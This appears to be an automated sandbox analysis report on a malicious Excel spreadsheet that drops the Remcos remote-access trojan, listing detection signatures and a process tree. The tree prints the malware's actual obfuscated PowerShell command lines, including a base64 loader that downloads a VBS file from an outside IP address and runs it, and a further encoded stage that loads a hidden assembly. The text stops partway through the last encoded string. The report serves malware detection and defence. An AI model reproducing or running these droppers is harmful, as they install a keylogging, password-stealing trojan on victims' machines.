Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_304234.xls

Overview

General Information

Sample name:PO_304234.xls
Analysis ID:1500265
MD5:ac30e3d8b0557592e89bdca3e6b4e879
SHA1:d484bca1c79af754eced69d18348c2a5e8cbe325
SHA256:adf8f2babc9a03e459102fd4290645fd46ae83f3001e581a7735f592449fd421
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3528 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3776 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3888 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3912 cmdline: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 4012 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 4020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? 